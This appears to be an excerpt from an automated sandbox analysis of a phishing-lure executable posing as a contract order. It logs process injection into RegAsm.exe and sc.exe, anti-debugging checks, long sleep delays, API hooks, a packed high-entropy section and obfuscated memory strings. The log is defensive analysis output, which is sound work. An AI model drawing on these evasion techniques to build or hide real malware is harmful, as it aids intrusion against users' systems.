Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Code function: 5_2_028BCD74 push ds; iretd 5_2_028BCDC5
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_0399225F pushad ; ret 6_2_039927F9
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039927FA pushad ; ret 6_2_039927F9
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_039C09AD push ecx; mov dword ptr [esp], ecx 6_2_039C09B6
Source: New Order - RCII900718_Contract Drafting.exe Static PE information: section name: .text entropy: 7.99304503862032
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: Yara match File source: 00000000.00000002.1720676508.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: New Order - RCII900718_Contract Drafting.exe PID: 1892, type: MEMORYSTR
Source: C:\Windows\SysWOW64\sc.exe API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\sc.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\sc.exe API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\sc.exe API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\sc.exe API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\sc.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\sc.exe API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\sc.exe API/Special instruction interceptor: Address: 7FFE2220DA44
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Memory allocated: F10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Memory allocated: 28B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Memory allocated: 48B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0289096E rdtsc 1_2_0289096E
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Window / User API: threadDelayed 4150 Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Window / User API: threadDelayed 5823 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\sc.exe API coverage: 2.6 %
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe TID: 2916 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe TID: 2656 Thread sleep count: 4150 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe TID: 2656 Thread sleep time: -8300000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe TID: 2656 Thread sleep count: 5823 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe TID: 2656 Thread sleep time: -11646000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\sc.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\sc.exe Code function: 6_2_02F2CA10 FindFirstFileW,FindNextFileW,FindClose, 6_2_02F2CA10
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721970485.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721970485.0000000003AD8000.00000004.00000800.00020000.00000000.sdmp, New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721970485.000000000397D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %Q8DF/d6IEvcmRxK/iqxe0yLE/4ixU1vcltilIl%IY6Ul%8QemudZZ%7DFxhQyuY1PM74qlv5Esy
Source: New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721970485.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: iUYZ%tz+5ovrFRKmMAQ8DF/d6IEvcmRxK/iqxe0yLE/4ixU1vcltilIl%IY6Ul%8QemudZZ%7DFxhQyuY1PM74qlv5EsyT9e5i
Source: sc.exe, 00000006.00000002.2977665984.000000000325E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
Source: ZrTbKDhAWYKJu.exe, 00000007.00000002.2978554766.00000000007CF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: firefox.exe, 00000008.00000002.2536722694.00000248A9E7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0289096E rdtsc 1_2_0289096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_00417DA3 LdrLoadDll, 1_2_00417DA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288E284 mov eax, dword ptr fs:[00000030h] 1_2_0288E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288E284 mov eax, dword ptr fs:[00000030h] 1_2_0288E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D0283 mov eax, dword ptr fs:[00000030h] 1_2_028D0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D0283 mov eax, dword ptr fs:[00000030h] 1_2_028D0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D0283 mov eax, dword ptr fs:[00000030h] 1_2_028D0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028602A0 mov eax, dword ptr fs:[00000030h] 1_2_028602A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028602A0 mov eax, dword ptr fs:[00000030h] 1_2_028602A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028E62A0 mov eax, dword ptr fs:[00000030h] 1_2_028E62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028E62A0 mov ecx, dword ptr fs:[00000030h] 1_2_028E62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028E62A0 mov eax, dword ptr fs:[00000030h] 1_2_028E62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028E62A0 mov eax, dword ptr fs:[00000030h] 1_2_028E62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028E62A0 mov eax, dword ptr fs:[00000030h] 1_2_028E62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028E62A0 mov eax, dword ptr fs:[00000030h] 1_2_028E62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_029262D6 mov eax, dword ptr fs:[00000030h] 1_2_029262D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0285A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0285A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0285A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0285A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0285A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028602E1 mov eax, dword ptr fs:[00000030h] 1_2_028602E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028602E1 mov eax, dword ptr fs:[00000030h] 1_2_028602E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028602E1 mov eax, dword ptr fs:[00000030h] 1_2_028602E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0284823B mov eax, dword ptr fs:[00000030h] 1_2_0284823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0290A250 mov eax, dword ptr fs:[00000030h] 1_2_0290A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0290A250 mov eax, dword ptr fs:[00000030h] 1_2_0290A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D8243 mov eax, dword ptr fs:[00000030h] 1_2_028D8243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D8243 mov ecx, dword ptr fs:[00000030h] 1_2_028D8243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0292625D mov eax, dword ptr fs:[00000030h] 1_2_0292625D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0284A250 mov eax, dword ptr fs:[00000030h] 1_2_0284A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02856259 mov eax, dword ptr fs:[00000030h] 1_2_02856259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02900274 mov eax, dword ptr fs:[00000030h] 1_2_02900274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02900274 mov eax, dword ptr fs:[00000030h] 1_2_02900274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02900274 mov eax, dword ptr fs:[00000030h] 1_2_02900274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02900274 mov eax, dword ptr fs:[00000030h] 1_2_02900274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02900274 mov eax, dword ptr fs:[00000030h] 1_2_02900274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02900274 mov eax, dword ptr fs:[00000030h] 1_2_02900274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02900274 mov eax, dword ptr fs:[00000030h] 1_2_02900274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02900274 mov eax, dword ptr fs:[00000030h] 1_2_02900274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02900274 mov eax, dword ptr fs:[00000030h] 1_2_02900274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02900274 mov eax, dword ptr fs:[00000030h] 1_2_02900274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02900274 mov eax, dword ptr fs:[00000030h] 1_2_02900274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02900274 mov eax, dword ptr fs:[00000030h] 1_2_02900274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02854260 mov eax, dword ptr fs:[00000030h] 1_2_02854260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02854260 mov eax, dword ptr fs:[00000030h] 1_2_02854260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02854260 mov eax, dword ptr fs:[00000030h] 1_2_02854260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0284826B mov eax, dword ptr fs:[00000030h] 1_2_0284826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287438F mov eax, dword ptr fs:[00000030h] 1_2_0287438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0287438F mov eax, dword ptr fs:[00000030h] 1_2_0287438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0284E388 mov eax, dword ptr fs:[00000030h] 1_2_0284E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0284E388 mov eax, dword ptr fs:[00000030h] 1_2_0284E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0284E388 mov eax, dword ptr fs:[00000030h] 1_2_0284E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02848397 mov eax, dword ptr fs:[00000030h] 1_2_02848397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02848397 mov eax, dword ptr fs:[00000030h] 1_2_02848397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02848397 mov eax, dword ptr fs:[00000030h] 1_2_02848397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0285A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0285A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0285A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0285A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0285A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0285A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028583C0 mov eax, dword ptr fs:[00000030h] 1_2_028583C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028583C0 mov eax, dword ptr fs:[00000030h] 1_2_028583C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028583C0 mov eax, dword ptr fs:[00000030h] 1_2_028583C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028583C0 mov eax, dword ptr fs:[00000030h] 1_2_028583C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D63C0 mov eax, dword ptr fs:[00000030h] 1_2_028D63C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FE3DB mov eax, dword ptr fs:[00000030h] 1_2_028FE3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FE3DB mov eax, dword ptr fs:[00000030h] 1_2_028FE3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FE3DB mov ecx, dword ptr fs:[00000030h] 1_2_028FE3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028FE3DB mov eax, dword ptr fs:[00000030h] 1_2_028FE3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028F43D4 mov eax, dword ptr fs:[00000030h] 1_2_028F43D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028F43D4 mov eax, dword ptr fs:[00000030h] 1_2_028F43D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0290C3CD mov eax, dword ptr fs:[00000030h] 1_2_0290C3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028603E9 mov eax, dword ptr fs:[00000030h] 1_2_028603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028603E9 mov eax, dword ptr fs:[00000030h] 1_2_028603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028603E9 mov eax, dword ptr fs:[00000030h] 1_2_028603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028603E9 mov eax, dword ptr fs:[00000030h] 1_2_028603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028603E9 mov eax, dword ptr fs:[00000030h] 1_2_028603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028603E9 mov eax, dword ptr fs:[00000030h] 1_2_028603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028603E9 mov eax, dword ptr fs:[00000030h] 1_2_028603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028603E9 mov eax, dword ptr fs:[00000030h] 1_2_028603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0286E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0286E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0286E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0286E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0286E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0286E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028863FF mov eax, dword ptr fs:[00000030h] 1_2_028863FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288A30B mov eax, dword ptr fs:[00000030h] 1_2_0288A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288A30B mov eax, dword ptr fs:[00000030h] 1_2_0288A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0288A30B mov eax, dword ptr fs:[00000030h] 1_2_0288A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0284C310 mov ecx, dword ptr fs:[00000030h] 1_2_0284C310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02870310 mov ecx, dword ptr fs:[00000030h] 1_2_02870310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02928324 mov eax, dword ptr fs:[00000030h] 1_2_02928324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02928324 mov ecx, dword ptr fs:[00000030h] 1_2_02928324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02928324 mov eax, dword ptr fs:[00000030h] 1_2_02928324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02928324 mov eax, dword ptr fs:[00000030h] 1_2_02928324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0291A352 mov eax, dword ptr fs:[00000030h] 1_2_0291A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h] 1_2_028D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h] 1_2_028D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h] 1_2_028D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h] 1_2_028D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h] 1_2_028D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h] 1_2_028D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h] 1_2_028D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h] 1_2_028D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h] 1_2_028D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h] 1_2_028D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h] 1_2_028D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h] 1_2_028D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h] 1_2_028D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h] 1_2_028D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h] 1_2_028D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D035C mov eax, dword ptr fs:[00000030h] 1_2_028D035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D035C mov eax, dword ptr fs:[00000030h] 1_2_028D035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D035C mov eax, dword ptr fs:[00000030h] 1_2_028D035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D035C mov ecx, dword ptr fs:[00000030h] 1_2_028D035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D035C mov eax, dword ptr fs:[00000030h] 1_2_028D035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D035C mov eax, dword ptr fs:[00000030h] 1_2_028D035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0292634F mov eax, dword ptr fs:[00000030h] 1_2_0292634F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028F8350 mov ecx, dword ptr fs:[00000030h] 1_2_028F8350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028F437C mov eax, dword ptr fs:[00000030h] 1_2_028F437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0285208A mov eax, dword ptr fs:[00000030h] 1_2_0285208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028480A0 mov eax, dword ptr fs:[00000030h] 1_2_028480A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028E80A8 mov eax, dword ptr fs:[00000030h] 1_2_028E80A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_029160B8 mov eax, dword ptr fs:[00000030h] 1_2_029160B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_029160B8 mov ecx, dword ptr fs:[00000030h] 1_2_029160B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D20DE mov eax, dword ptr fs:[00000030h] 1_2_028D20DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0284A0E3 mov ecx, dword ptr fs:[00000030h] 1_2_0284A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028580E9 mov eax, dword ptr fs:[00000030h] 1_2_028580E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D60E0 mov eax, dword ptr fs:[00000030h] 1_2_028D60E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_0284C0F0 mov eax, dword ptr fs:[00000030h] 1_2_0284C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028920F0 mov ecx, dword ptr fs:[00000030h] 1_2_028920F0
